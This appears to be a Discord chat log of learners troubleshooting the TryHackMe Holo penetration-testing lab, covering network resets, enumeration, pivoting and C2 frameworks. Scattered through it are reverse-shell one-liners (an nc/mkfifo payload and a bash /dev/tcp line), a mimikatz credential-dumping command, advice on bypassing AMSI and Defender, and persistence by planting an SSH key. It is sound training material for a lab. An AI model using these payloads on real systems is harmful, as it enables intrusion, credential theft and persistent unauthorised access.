PC-FILESRV01 in 10.200.110.0 does not receive any SMB connections - literally 0. I checked that with Wireshark (tcp.port == 445). Executing NTLM Relay is not feasible. Restarting PC-FILESRV01 did not help. I will reset the network but it is the second network with such issues (10.200.128.0 has them as well). Is it a common issue? Anybody had it? Is resetting the network going to resolve it?
#holo-network
@lone spruce do you want me to rebuild S-SRV02 this weekend
well, next
I think S-SRV02 was also cloned and it broke priv esc
Currently the last attack for the network is broken. You're describing the problem exactly as it is
Thanks for confirming!
Gave +1 Rep to @solid timber
If it doesn't violate your NDA, yeah. I'm far too busy rn
Hi
Is there a way to use Burp with a website over sshuttle? It doesn't seem to work for me
And I can kinda understand why, it's just that me and Google don't seem to have a solution
I used ss -anpt to find that sshuttle listens on localhost 12300, so I made a rule in Burp upstream proxies to send all upstream traffic to localhost 12300, but it seems to not go through as the webpage at 10.200.131.31 doesn't load
I think it just plain worked for me.
sshuttle uses iptables rules, I don't think you need to do anything special.
I never got around to finishing the AV stuff, but I don't think I had any problem with running Burp Suite through sshuttle.
Hey, I'm having trouble with AV detection, my AMSI bypass seems to be working because the server requests the payload (obfuscated PowerShell reverse shell) from my server.
but that's as far as I can get, can anyone give me a sanity check on this process
what have you done so far?
I made it work by using the Cobalt Strike stager in the end
gotcha
but before that I thought I had patched AMSI and just had to get a shell
which didn't work
I then dumped the hashes and I can pass the hash with CrackMapExec using SMB, but get no answer on WinRM, is that intended?
yes
ok, got it now, thanks!
Gave +1 Rep to @solid timber
Is NTLM relay fixed?
What? None of that needs to happen when a network is reset? And a network requires some pretty strict requirements to be reset
@wind bobcat
@wind bobcat Do you know when NTLM relay will be fixed?
hi guys, I have a problem with the Grunt stager in Covenant.... I have followed RastaMouse's guide, changed the Covenant signature flagged by ThreatCheck.exe and uploaded it to the server S-SRV01, and it works, but when I receive the Grunt in Covenant it doesn't work; it tells me that the Grunt is untrusted or uninitialized when I launch a PowerShell whoami command... can anyone tell me why?
hello
@frail axle were you able to complete the DLL injection
No, it did not work for me. I had to use another way to privesc.
Is anyone online?
Hi
in
second this
requesting the machine to be spun up
Hello, network is up, but I can't see any machines. Pls someone DM me
ntlm relay not fixed yet?
we're waiting for the VM to be deployed into the network dev segment
getting anything done during aoc is essentially impossible lol
Is NTLM relay fixed?
...no
Thx
Gave +1 Rep to @wind bobcat
Any view when it will be fixed? This is the last task that I need to do in order to complete Holo.
I cannot provide any time estimate. AOC is going in and all thm staff are swamped.
Thx. I understand.
No it has nothing to do with nmap
The Holo network also doesn't appear to be responding to me (or at least; poorly). It was working earlier today, but now a ping doesn't get a response.
Okay so the 'main' website (DC-SRV01) is listed as being hosted on 10.200.178.30 on THM, but appears to actually be hosted at 10.200.178.33.
Adding the following to my hosts file allows me to continue working:
10.200.178.33 holo.live
10.200.178.33 www.holo.live
10.200.178.33 admin.holo.live
10.200.178.33 dev.holo.live
Aaaaah! I somehow figured the DC was the main one as it was on the top, but you're totally right! Thanks!
Knock knock!!! I am on task 28. Which user wordlist should I use?
Ooh yeah, got that, sorry, I already had that.
hello mate! I am on task 28, how can we get that reset token? I got user-token but not reset_token.
I mean I did forget password, got user token and PHP session ID, now how can I log in?
Well, solved that.... It was easy but a bit tricky.
L-SRV01 is dead (at least for me). I had chisel running on it, when suddenly the connection broke down. It also is not reachable over ssh anymore... Tried leaving the room and entering it again. No success. Tried regenerating the ovpn file, no success either. Anyone else experiencing issues like this?
that sounds like another user shutdown the server tbh
either that or it's related to the AWS troubles
I had this problem an hour before you wrote this message here because the whole network was reset. sshuttle was not working but chisel worked. So I didn't do much and I just shut down my system, and now I am going to do that again.
do you guys have problems running sshuttle? I am still facing it.
Ok fixed...
Boom!! Connected with everything.... Everything is working fine now.
Hey guys, I am stuck on finding the password in task 17, can I get a hand
Did you read task 17 clearly? Read it one more time.
Ok I must be doing something wrong. I’m stuck on trying to root pc-filesrv01. No way to run the vulnerable app and no scheduled task
If you look closely you'll find everything in the same place; you just need to hijack.
Of course you can not run that app because you are not administrator.
But if you wanna try and dive deeper you can download the same app on your local system and try.
But the privesc method is a dll hijack for the app and it doesn’t run. I know what needs to be done, it just isn’t doing it
Bro it's a scheduled task if I am not wrong...
It’s not. There are no scheduled tasks in the users directory
Nothing calls that app, that’s what I’m saying
how is that possible? I checked that.
DM
Gave +1 Rep to @rigid carbon
Ohh you're welcome mate....
I feel like I'm blind, I must have read through it a thousand times and am just not getting it
You have a remote shell into the box, what files are in the directory? One very interesting file holds the answers for the task
IDK what I am doing wrong but I am stuck at task 43 and yes it's kinda shameful but please help 😅
any help would be appreciated
It's crazy, I am stuck on the same point.
Can any moderator please check the Holo machine for the task 43 priv esc
Another user pointed me at a different path than the scheduled task, it involves a printer. What a nightmare. I can’t pivot to the last box though so I’m giving up for now
Yea. This is how I did that part. The NTLM relay is broken as of now and likely won't be fixed till some time in January cuz all of THM is extremely busy with AoC right now
Makes sense, at least I did all the hard parts 😂
Remember that's not what mods are for. Mods are discord staff.
Can you explain me about this another way please
Can I dm you directly for it ??
I tried to create another scheduled task with a few other paths which I got from applocker_bypass_checker; the task triggered and, as expected, asked for admin privileges, but I didn't get a shell
still working on that.
Boommm!!!! and Done.
Is NTLM relay fixed?
task 10. error on running gobuster: unable to connect to http://xxx.10.200.126.33/: Get "http://xxx.10.200.126.33/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
what's xxx.10.200.126.33?
it's a subdomain of the first web server
I can tell you it's not supposed to be www.10.200.126.33
or dev.10.200.126.33
it's supposed to be www.holo.live
or dev.holo.live
I added this IP as holo.live in hosts, but it didn't help
if you're calling the IP address and not holo.live of course it won't help
it does DNS -> IP translation, not IP -> DNS
ok, but I don't understand what I should do to make it work?
if you're trying to enumerate files and directories on the webserver:
gobuster dir -u www.holo.live -w /path/to/wordlist
if you're trying to enumerate subdomains:
gobuster vhost -u holo.live -w /path/to/wordlist
with your /etc/hosts file having
10.200.126.33 holo.live
in it
and for each new subdomain you discover, add 10.200.126.33 newsubdomain.holo.live
then you can access it like you normally can for a standard website.
oh, thanks)
I don't think waiting for any message for 10 mins
NTLM-Relay is broken we must wait for tryhackme team to fix that.
it's not normal for none of the machines to respond to nmap and pings, right?
hi guys
I need help with PC-FILESRV01, I can not run the application kavremover because it is blocked
any hints? ideas?
it is a scheduled task which is right now not working for some time
use this method instead
i really appreciate your response, thank you soooo much
Gave +1 Rep to @foggy spire
hello, has anyone had problems regarding the Holo network? It timed out for me and when I started it again, I cannot access the initial Linux system
I am connected to the VPN
can't reset it either, since I need 2 more reset votes
thanks for it)
Gave +1 Rep to @foggy spire
Hi, I'm having an issue with adding holo.live to my /etc/hosts file. I added the line "10.200.107.33 holo.live", but when I try connections to holo.live within my browser, nothing happens and it just says "unable to connect"... Any idea why? Kinda frustrating... (btw I can connect to the webserver using 10.200.107.33)
or "Hmm. We’re having trouble finding that site."
try removing the www
finally works... I added www.holo.live in /etc/hosts (as I did prior) and restarted the network... don't know what happened...
Is NTLM relay fixed?
Hey
Fun challenge even if you can only make it ~90% of the way atm. I was convinced I was doing something wrong and was double and triple checking every command only to see there are some known issues with step 43+
Kinda stuck with the amsi bypass and everything, any idea ? Thanks...
(I've managed the AMSI part, but don't understand how I'm getting a reverse shell...)
Ok now something new: I'm getting an error, can't connect back to the machines on the network: no route to host when I ssh as linux-admin
(shut after the network shutdown because I forgot to add time 🤦)
Nevermind, I got it !
And for this part, had to wait for the network to shutdown and then restart it...
If I am VIP and started Holo today, will I have access after 9 days?
you need to rejoin after 9 days - this is so users can be evenly distributed across multiple subnets
anyone wanna chat about the room and the info from there? got blocked at some points
I'm at task 39, if I can help!
that'd be awesome. Can I DM you?
And I'm stuck, I've got nothing in mod loads, so can't identify an anti-malware solution
Sure !
Got it running : ||seatbelt instead||
Hey, how did you find this? I'm interested in the methodology you used... many thanks
Gave +1 Rep to @foggy spire
This community man
Plus I am currently studying AD for some certs 😅
Okay well thank you! 😉
Is it normal that Procmon doesn't show anything? Am I missing something? Because the vulnerable ||wow64log.||dll doesn't even exist...
Will the answers be deleted?
They will not.
No, your progress is not cleared.
My bad, I thought the progress was saved but the answers were deleted, but I checked on Wreath and you're right!
Thank you both!
Any changes to machines will be lost as you're likely to end up on a new network
Also, what can I do to be a room and/or room tester on @final patio?
Someone that can help me with domain enumeration, please? Task 9-10
DM me
I need help
TASK43
What is the name of the vulnerable application found on PC-FILESRV01
tree /f is your friend.
Remember, portable applications don't need to be installed in the c:\Program* folders.
Anyone online who can help me with tasks 9-10?
Hi guys, is there someone who wants to discuss the AV evasion part? I'm able to gain access to the machine, though not via the intended way; however, I would like to do it that way. I mean, generate a Covenant Grunt with this and obfuscate it in a manner so it can bypass AMSI and Defender?
Is NTLM relay fixed on PC-FILESRV01? Just asking.
I am getting
even though I have added www.holo.live in /etc/hosts
Is that broken or am i making any mistake
admin web app is hanging, please vote for a reset
I don't have any problems with the admin app. It's loading fine for me.
There are a lot of different subnets. Please specify
In task 29
Now that we have successful authentication to the web app we know that we have an upload page, however, from code analysis the page uses client-side filtering meaning we can only upload images.
…but I don't see this. Looking at the JS I don't see anything that would reject files from being uploaded. I can upload any type of file.
I suppose someone could have removed this filter from the js on the server? (This server is in the 10.200.135.0/24 subnet for me)
10.200.95.0/24
Anybody had any problems with the time in covenant?
It's always one hour off from my system and I can't execute any commands
Using Firefox you must go to this config URL, about:config, and search javascript. You must disable javascript.enabled.
Anyone having issues with the VPN IP address not being within the Holo Live IP range? I get a 10.50.x.x when Holo Live is a 10.200.x.x. I went ahead and regenerated my VPN and still the same.
@honest oasis the scope you're given is "10.200.x.0". The third octet is filled in with whatever 3 numbers you were given in your network diagram (L-SRV01). That's your scope and you scan the entire subnet (network range) and see what hosts are down or up and go from there
So I tried to fping the entire subnet with no luck and let Nmap run on the entire subnet and only got a .250 (last octet) that had port 22 SSH open. Nothing along the lines of a web server which is being asked for in the first set of questions. No routing needs to be completed for the room correct?
My scan looked like this:
sudo nmap -sV -sC -p- -v -oN holo.txt 10.200.x.0/24
Can you ping 10.200.x.33? @honest oasis
Nope says Destination Host Unreachable
Are you connected to the Holo Live (network) VPN?
I am yes but the hololive VPN has me in a 10.50 range not a 10.200 range
Correct
My hololive vpn is also 10.50.x.x. But the focus is being able to talk to 10.200
You started the network, correct?
The network state says: running
In the current window it has running, yes.
That's weird. I would ask cryllic or spooks then, I don't know what the issue could be lol
All good, thanks for helping. I was also not sure cause the tasks never say anything about having to do any routing so wanted to reach out here first
Yea no problem. Hopefully your issue gets fixed soon
@sullen adder the vhost enumeration url should be holo.live
oh ok
it still gives me the answer to question 2
Related to Task 36
On S-SRV01 you're supposed to dump a cleartext password using mimikatz, however this doesn't seem to work anymore.
I have a Cobalt Strike beacon on the box and I ran this command:
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
No clear text password to be found... in the output.
The NTLM hash is crackable with the rockyou.txt wordlist though.
Also, you're supposed to be able to authenticate to PC-FILESRV01 with the domain creds/NTLM hash dumped before. That also doesn't work.
RDP login does work though...
Maybe someone made some changes here and there?
Network: 10.200.95.0/24
cry designed that portion iirc.
@lone spruce is that intended
you need to specify the subnet you're in
@lone spruce Is NTLM relay fixed on PC-FILESRV01? Just asking.
@lone spruce There is also no scheduled task on PC-FILESRV01 that runs the vulnerable app to do the PrivEsc.
Network: 10.200.95.0/24
Hi guys! Concerning Task 20 (PrivEsc after escaping the container): The exploit requires sudo to work. However, so far there wasn't any hint or mentioning of that. Did I miss something?
nvm, I was overcomplicating things, in combination with not being too familiar with the container commands. Got it now! 😄
When I'm creating a default HTTP Listener in Covenant, nothing happens. Covenant is running as root and I have tried different ports... can someone help me pls?
Am I the only one having trouble with Covenant??
Haven't played with Covenant for a while but I would expect that basic functionality would just work.
I used Cobalt Strike in the Holo labs, I haven't tried to do it with Covenant.
That being said, you say you created a listener, but did you also create a grunt and ran that on the victim box?
I tried to create a listener. After filling in all the required values and clicking CREATE, there is no listener in the list. So there is no listener to select when creating a launcher or grunt
Not sure why that is based on the information you provided. Maybe just try a different C2 framework such as Empire?
hey folks, sorry about the delay on SRV02 - The rebuild is almost done.
Will that also bring PC-FILESRV01 back in order as there also seem to be things that look out of order.
(See my previous comments)
I can't break out of the Docker env in task 18
I am getting connected as the same user with the reverse shell
0
In theory - yes.
Waiting on Skidy and Ashu.
your http query is a bit botched, you may want to look at that.
Great, looking forward to finishing Holo. I finished Wreath in the meantime...
hey quick question..
I completely understand the concept but I've never set up a server before and they include an index.php file with some *.jpg's and want you to get a "prototype" running on your own LAMP server.. I can get it to load an index.php and other directories but to do an LFI you have to issue a URL such as http://127.0.0.1/img.php?file=CatPics.jpg and I keep getting a 404.. There is no img.php and to my understanding it's supposed to load catpics.jpg but well... doesn't.. what am I missing?
CatDog room?
lol..
I see a https://tryhackme.com/room/catpictures room.. lol
totally thought you were just referring to this room because I mentioned catpics.jpg.. It's an LFI room.. 🤦‍♂️
Yeah, will try Empire, I guess. Btw, this is the problem: https://github.com/cobbr/Covenant/issues/327
Oh well, I don't like saying this but that sums up my experience with Covenant to be honest...
When I started playing with it soon after its first release, I found a lot of problems as well. And this seems to persist. Development is just too slow on this project, I feel. And this is in no way a blame on the project maintainers, we're all busy people!
I like the idea of a C#-based C2 framework but IMO Covenant isn't mature enough to be considered for use on a real engagement. Empire is still viable in some real-world environments and there are other frameworks that are more stable and mature, both open source and paid products.
yeah... I just wish there were a note of some sort on the Holo Room where Covenant is introduced. The bug was raised in July, so... people are bound to hit the same problem 🤨
I am getting this error while submitting the user_token
Notice: Undefined index: password in C:\web\htdocs\login.php on line 6
I can see one major issue - dotnet run isn't being executed as root. That would be the reason for not binding on low level ports
in one screenshot:
got it
Hi, what's the network's status? Is the NTLM relay fixed?
hey guys I got a 404 when downloading the Holo Live ovpn file
can anyone help with this tech issue
I did run dotnet with sudo. But even without, then it should at least work with higher ports, which it didn't. As I mentioned earlier, there is an open bug issue from July, which addresses the exact same issue that I am having with Covenant. So, either the maintainers get to fix it or I (we) will have to use other C2 frameworks...
Question about Tasks 30 - 35 (AV Evasion): Is there anything we are supposed to do (code) here? The texts are all written in a way that suggests we have some kind of coding project, but it never mentions anything in particular. Then, at the end of the last task, it says we have a binary that can avoid detection and that we should deploy with our C2 framework... What binary??
GruntHTTP.exe
Generate a Grunt launcher with Covenant. You can generate multiple types of launchers, one of them is an exe.
Just so you know, you don't have to use covenant or a C2 framework, if it bothers you too much, just craft a simple ps1 reverse shell that bypasses amsi detection and av...
Can anyone confirm the NTLM relay is still broken?
Tried an hour ago. Still no luck 💔
Also there's no scheduled task
K thanks 😢
Gave +1 Rep to @green cobalt
Hey gents
Looking for some guidance on PC-FILESRV01
added the DLL to the application path
but I can't initiate the app itself
is this expected to be run via a system task?
nothing on it 😐
grrr
Any tip ?
The Holo network is currently broken (see previous messages). Hopefully soon, they'll get it fixed...
I'm having issues with the shell of task 35
I got RCE using a PHP payload
but it seems like the server detects my covenant grunt
because I don't get a reaction to my listener
oh
I had a different bind port
Oh I thought somebody patched the webserver that prevented my shell from working lol. Well I pivoted to Virtual Hacking Labs. Trying to get as much discount training as I can from my $1,400 stimulus check.
The first box (webserver) should be fine, unless some a***hole made changes to the config, then a network reset can help...
Is there a problem with 10.200.120.0/24? Because I have chisel running and I can't seem to reach S-SRV01 with either netcat or nmap using proxychains
But I was able to reach 10.200.120.250
Well. At least I got my $60 worth from Throwback
hello Friends, I am planning to start with the Holo Room, but I am afraid I will face the same issues as with Wreath, because in Wreath sometimes I was stuck and couldn't connect to the machines. Is it the same or better 😄?
It happened to me 2 times, but just let the network expire, start it back and it works again! Though you won't be able to finish the network since it's broken (NTLM relay)
thanks @zenith delta , Great Advice ☺️
Gave +1 Rep to @young stump
hello, can someone help me at task 10 - what the fuzz?
What's up ?
Thanks @zenith delta !
Gave +1 Rep to @young stump
has anyone ever ransomed one of the networks lol
obviously would just be annoying but was curious
we haven't ever heard of it
likely wouldn't work because of lack of outbound network access
I mean with VPN access right?
the machines still can't beacon out
so the decryption keys would be lost completely, unless said ransomware just didn't care
Oh yeah I just meant someone being a jerk
but in all our time, we haven't heard of it
Hi , I need some help on task 10 of this network
will anyone be able to help on this
?
Sure, what's up ?
yep
Is anybody free at the moment? I need some help
sure
Anybody around to give a little push ? i am stuck on a specific task
I can't log into the webapp with the admin creds.
It keeps kicking me to the index.php page. Is this right?
Any hint on AMSI bypass, I've a working and tested AMSI-bypass script, which I can't get running on SRV01 for some reason
Amsi.fail
Tried all methods in this, can I pm regarding the payload?
I've rooted l-srv01
Is the Holo network meant to be completed in one stretch
Or should we start over all again if the network goes down
There are some definite checkpoints
Creds or keys make it easy to get back into that host
anyone around to give a little nudge on task 28 please
anyone successfully installed covenant on arch linux?
yes I did
can I DM you, I am having trouble installing covenant on arch regarding the SDK
sure
What script are you using?
Nevermind I got it working
Used invoke-psobfuscation.
Hi, can someone tell me why DLL hijacking fails? I'm working on Holo
I had the same problem a week ago, I think that is because the required service isn't running on the PC-FILESRV01 box. I believe they disabled this because the ntlm relaying part in Holo network is broken and they are fixing this...
thank you
Gave +1 Rep to @solid oasis
yo, really need help here on task 37 "Good Intentions, Courtesy of Microsoft: Part II". I'm at the part where I got an NT hash and a user and now need to use either CrackMapExec or evil-winrm. Note I'm using chisel for the tunneling. But I get nothing. Not a single thing comes up, idk what I'm doing wrong. When I type proxychains and then crackmapexec I just get like [proxychains] strict chain with timeout. Banging my head against the wall. Plus xfreerdp doesn't work either. HELP... anyone...
The lab needs to be reset - the web server is down.
Is this seriously how this works? The lab is a shared environment so someone wrecks the web server and now I have to wait until 3 other people agree to reset the environment?
There are multiple shared instances. This is the only reasonable way we can facilitate a network that does not require an increased fee. The likelihood of you encountering another user is low.
I get it. Just not happy with the web server being down in this instance. Don't mind me being disgruntled.
Yeah so now the webserver is completely offline. Please vote to reset.
Hey, can some one press reset button on holo room? 😄 Need 2 votes. Thanks in advance.
so you all kind of need to tell each other which subnets you're in
Yeah we worked that out
yo, on task 43 I have done everything but kavremover can't be opened, I just get a pop-up saying "this app has been blocked by your system administrator". Have I missed something? Stuck for like 1 or 2 days
the DLL hijack doesn't work, I'm just waiting and nothing happens
pls anyone help
do you know when it will be fixed or so?
guys, I've done the nmap scan and it resulted in 2 IPs: 10.200.110.33 and 10.200.110.250. Are they correct? Because I think only 10.200.110.33 should appear due to the first question at task 8
250 is internal thm infrastructure.
so I don't need it for the network, yeah?
Nope, don't know... I'm waiting for a fix myself 🤷♂️
so we need to wait or is there a workaround? Tried the PrintNightmare exploit but it doesn't really work, so
If you want to follow the intended path then I guess we'll have to wait. I don't know other paths, haven't tried that due to time constraints
oh okay
it's now running again
fuzzing 😉
intercept the web request
Was anyone able to create a binary grunt launcher that bypasses AMSI and Defender? I ended up having to use a powershell payload.
Should I run gobuster again ?
Let me do this
Hi is the lab working again for NTLM relays? Right now on other things with my homelab and VHL.
Hey guys,
when the time runs out and the network state is "stopped" will a restart (not an extend) reset the webserver as well?
no
its just sleeping
guys, what's the IP of the webserver? It is not connecting and nmap isn't helpful
isn't it showing the IP address in the image at the top of the page?
THM says L-SRV01=192.168.100.1 and L-SRV02=192.168.100.100 but I can't connect to any of these
when I type www.holo.live in the browser it automatically redirects to https and doesn't load at all ..
What does it say for DC-SRV01?
10.200.110.30
I thought that L-SRV01 should start with 10.200.110.X as well and only L-SRV02 should have a 192.168.X.X address.
I checked 10.200.111.33 but don't see port 80 open
Seems like an issue with tenants.. I don't have port 80 open on 10.220.111.33
Let's reset the network and see
ok, I restarted all and rescanned all and 10.200.110.33 is working, thx for the help guys
+rep @ocean hare
Gave +1 Rep to @ocean hare
Still facing an issue with the 10.200.111.0/24 segment.. Can people help me with a reset
try to restart your guest or wait for the reset of the machine
guys, I'm using chisel, the connection is up, /etc/proxychains.conf is set but it's not working, anyone who can
@opal scarab what's the chisel command you ran on your machine and what's the command you ran on the remote box?
and i presume your proxychains.conf file has socks5 127.0.0.1 1080 at the end?
yes
okay, so that should be fine
can you spawn yourself a new ssh session inside the network and try curling the webserver from there directly?
maybe it's just dead for some reason
config
Still Stuck with Task 10 "What file loads images for the development domain?" any help
find an image on dev.holo.live, right click, open in a new tab @winter barn
Got it ..
@wind bobcat any update on the NTLM relay fix? (Thx)
yeah. hoping it will be fixed next week since my subs will end soon.
assuming the machines were cloned last week, it should be fixed.
I haven't had time to test it, I've been busy traveling for work
k, I'll try this afternoon then 😉 thanks for the incredible work anyway !
Anyone having network issues?
can we reset the network pls?
Which network you are in ?
i would say Dio is in the x.x.110.x and Abhi in the x.x.111.x
We had that yesterday already 😄
haha..
Hey guys. I am trying to escape the docker container on L-SRV02.
Here is what I am doing in the container shell
curl 192.168.100.1:8080/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
and in my attacking machine,
nc -nvlp PORT
I am receiving the shell on my terminal but it is of the container only. I am not receiving the shell of the actual machine.
My confusion: The RCE is on the actual machine. When I do ?cmd=ifconfig, I am able to see the network information of the actual machine, not the container. So, when I am running a reverse shell payload, shouldn't that execute as the actual machine?
you're not wrapping the whole url string in single quotes
otherwise those semi colons are interpreting the command as is
the server is only seeing rm, the container is seeing /tmp/;mkfifo...
Can I DM?
it would be better if we didn't, others can use this as a learning opportunity
sure
Want to know the purpose of doing it the way it is shown in the labs.
Isn't this much simpler, if done correctly?
how do you mean "if done correctly?"
I mean by adding the quotes to the payload
special bash operators aren't interpreted by the machine when wrapped in single quotes, essentially your curl command is forking off into 3-4 different commands.
Really, it has to be done that way if you're using curl. You have one other option which is to url encode the whole command
you can also escape each special character, but that's incredibly impractical.
https://tldp.org/LDP/Bash-Beginners-Guide/html/sect_03_03.html
I can confirm, the Holo network is now working like a charm, including the NTLM relay exploit! 😉

with that said, if your network hadn't been reset and it still no worky - restart network
Is the Holo network non-responsive for anyone else?
can't even ping the first host
seems the VPN might be an issue?
[+] Confirming connectivity
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum
(from the troubleshoot script, everything else was OK/green)
Just did vpn to the holo network, seems everything working fine. Have you tried to access websites via hostnames?
port 80 isn't even open
nmap -Pn -p 80 10.200.142.30
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 14:57 EST
Nmap scan report for 10.200.142.30
Host is up.
PORT   STATE    SERVICE
80/tcp filtered http
Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds
not according to my network diagram
To navigate you to the web server
mine lists 10.200.142.30 as the start
oh wait I think I looked at the wrong host, but I don't think 135.33 is responding either
yeah port 80 is still filtered
ok now it's working
weird, I scanned it and got no port 80 a few mins ago
Nvm, enjoy hacking
streaming it later 🙂
Nice, how much you are planning to cover from Holo network? 🙂
the entire thing over several streams
I cannot get a Covenant binary launcher to bypass AV. Seems to be AMSI; when I execute the payload I see a grayed-out "untrusted" check-in within Covenant. The check-in is not actually successful unless I disable Real Time Protection. Anyone gotten a Covenant binary to completely bypass AMSI and Defender?
Maybe need to chain an AMSI bypass with a Covenant executable that bypasses Defender? Not sure how to do that however.
You can bypass AMSI (but not covered in the lab), with powershell reflection, patching of the spawned AMSI process, or editing the registry with a JScript shellcode runner
I’m coming back guys, I just heard the lab is all good. So tonight I’ll get started again
Is it possible to combine an AMSI bypass and the Covenant launcher into one binary?
I’ll PM you.
Is NTLM relay fixed on PC-FILESRV01? Just asking.
Yes
Great news! Big thanks!
Gave +1 Rep to @young stump
Can't seem to log into the admin dashboard. I can enter the username and password but it never logs me in. Any tips?
Can we get 1 more vote to reset 10.200.146.x please?
Hi, in the Holo network, I have added the IP address to the hosts file, but I cannot visit the website with the hostname. Is this normal?
Which (sub)domains did you add to your hosts file?
I added || holo.live, dev.holo.live || to my host file.
Also try to type the full URL in the address bar of browser like http://holo.live
If not, some browsers do a Google search and default to HTTPS.
Thanks i will try it.
Gave +1 Rep to @solid oasis
Ok, something strange with the dots on my keyboard. I added the entry on a new line and took the dots from the numpad, now it's working👍
Need some help, guys. In the pivoting portion, it seems to me we are pivoting into the "same" network. The IP of our foothold machine is 10.200.133.33, which is part of 10.200.133.0/24. Now, with pivoting, we can access the other machines of the same network as well.
My question is: why weren't we able to access these "new" machines before? We knew from the initial info that the network is 10.200.133.0/24. All of the machines that we are now able to "see" are in the same network. How is it that now, from "within" the 10.200.133.33 machine, we are able to see them, but not during our initial recon?
I'm struggling with the password crack, section "Task 22 - Crack all the things".
Can anyone help please?
Yep !
Correct me if I'm wrong, but I'd say that has to do with routing tables. I'm guessing the network's mask only allows discussions between 10.200.133.x (a mask of 255.255.255.0), but there is a rule that makes .33 accessible from the outside (so it works as a webserver). In pivoting, what you do is basically send your requests through .33 and therefore the router lets you discuss with other devices!
So, in simpler terms, you mean the network is set up in such a way that external devices can only access the .33 machine and not the others, even though they are part of the same network?
Yes, because you're not in the network
You can test that by trying to access some other machine on the network 10.200.133.x before and after pivoting
(the network being 10.200.133.0/24)
Anyone familiar with this issue? It's for Task 13
upgrade your shell, you can use python
@zenith delta DM me please
I should've put more context, but the shell closes immediately after getting a connection so I'm not allowed to enter commands
Can you post code of the payload?
It worked the other day when I was working and now I'm trying to get to where I was
Try with this: /bin/bash%20-i%20>&%20/dev/tcp/10.50.125.98/4444%200>&1
I get nothing back
Oh f, have you tried to pass other commands to the cmd parameter, to see if you are getting anything?
Just got it, I used what you gave me but added "/bin/bash -c" in front, thank you for the help @pine ridge
Gave +1 Rep to @pine ridge
The commands were working, I tried "whoami" and "which python3", maybe something weird with that reverse shell, idk
@buoyant marlin awesome, happy hacking 
So I'm trying to upload chisel to L-SRV01 but I'm coming across an error: "error while loading shared libraries: libpcre2-8.so.0: cannot open shared object file: No such file or directory". I'm not sure if this is because of the way I got root or the version of chisel I am uploading. I mention the way I got root because I can't find certain tools such as wget when I enter "which wget", but it exists when I go to /mnt/usr/bin/wget. I won't post the command I used for root because I don't want to spoil, and idk how to use the spoiler cover over my messages.
So for task 34, I am supposed to use an AMSI bypass with a Covenant Launcher, right? PowerShell launcher, JavaScript, or C#?
I'm kind of held up right now; I wish I had installed the Windows Dev VM first before going down all these tasks. Now I am busy converting the VMware image into a raw disk image for KVM. At least I left a persistent reverse root netcat shell on L-SRV01 so I can backtrack if the network timer runs out.
Do not try to pivot from the docker container you use to get root access
It gives you full access to the file system, but not immediate access to the actual system, if that makes sense
You can echo a public SSH key into root's authorized_keys so you can SSH into the actual machine as root, if you want to pivot as the root user
However, you do not need root to pivot; you can just use the linux-admin user that you should have cracked a password for
OK, I'm clearly screwing something up and need a little help on task 9. Every time I run gobuster it says it "found" every single entry in the text list. gobuster vhost -u holo.live -w /usr/share/wordlists/dirb/common.txt
Anyone know what I'm doing wrong?
You use the -b switch to exclude status codes that are false positives. Here is an example: gobuster dir -u http://website.com --wildcard -t 10 -k -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --timeout 3600s -s 200 -b 429,404 -o gobuster-.txt
Actually my command was something I used on another box using dir bruteforcing, but you should try the -b switch.
Don't I need to use vhost since I'm trying to find subdomains? A dir is going to give me directories, is it not?
I could totally be misunderstanding what's being asked though.
No you are looking for subdomains.
Use vhost
I actually didn't encounter your problem when I ran gobuster vhost, maybe your network needs a reset
I just ran a dir for the giggles, just changed the FQDN to holo.live in your example, and got 200s on everything
so maybe
Did I screw up the hosts file? It's just supposed to be the IP address and www.holo.live, right?
You can submit one reset vote every hour. So if nobody on your network wants to vote. You can just keep adding reset votes once an hour and do something else like a different lab environment.
It was at 3/4 so I went ahead and hit reset on it.
Yeah try again, you should find two to three more subdomains.
Still doing it... starting to wonder if I have an issue with gobuster itself
I decided to pause on the AMSI bypass exercise until I learn the basics of JScript shellcode runners from OSEP material. From what I understand, getting an AMSI bypass to work is the hardest part of Holo. But I made myself persistent by adding my own SSH key to L-SRV01, so all I have to do is turn the network on again, SSH back in as root, restart chisel, reset the password for the account in a later task, and then upload my payload.
Not sure what distro you use, but I switched from Kali to Parrot. I like Parrot better; the tools and interface are way faster. And xfreerdp isn't bugged like in the latest Kali 2021.4a release.
I think the instructions are vague for the AMSI bypass, but I believe I am supposed to test out my AMSI evasion in the recommended developer VM first before proceeding.
Maybe I should distro hop and see if I have success. I just uninstalled and reinstalled gobuster and same thing. If anyone sees this tomorrow and I have not replied to this message, I am likely still stuck. But it's almost midnight here, so I am going to head to bed.
Yeah, I haven't even gotten there yet. I look forward to the challenge for sure.
While you are knocking down tasks 1-33, just download the recommended VM in the background and run it in VMware. I did try to qemu-img convert it into KVM but it broke on me for some reason; it went into an automatic repair loop. Probably because I first had to import it into VMware and then qemu-img convert it from there.
I was doing everything the hard way, because I like KVM and Proxmox so much.
That all makes sense actually, thank you. And that would be the reason why "which wget" wasn't working, right?
Gave +1 Rep to @cinder notch
Should be.
Remember that which checks the $PATH variable for the file you're looking for, so if it wasn't in the PATH, which will not find it
I'm pretty sure I checked the $PATH variable and the path was there, but I could be wrong. It was hours ago lol, but thanks again. When I get back on it, I'll add my own SSH key
I am having trouble running the Windows 11 version of the developer VM that was recommended on the THM Holo page. All I need is Visual Studio, right? Can I use my own Windows 10 VM? Edit: I'll try my CommandoVM install on my Proxmox VE while I'm waiting for VMware Tools to get this Windows 11 development VM working.
The point of the developer VM is to have something to compile C# Visual Studio projects and modify code to test and evade AV
So do as you please
Fixed. It looks like VMware Tools needed to be installed. Just like the Red Hat VirtIO drivers for Windows machines on Proxmox.
THM staff, it seems there's an issue with the fileserver. Tried to restart twice but it's not coming back up. 💔 💔 💔
Hope you could check it. Thanks!
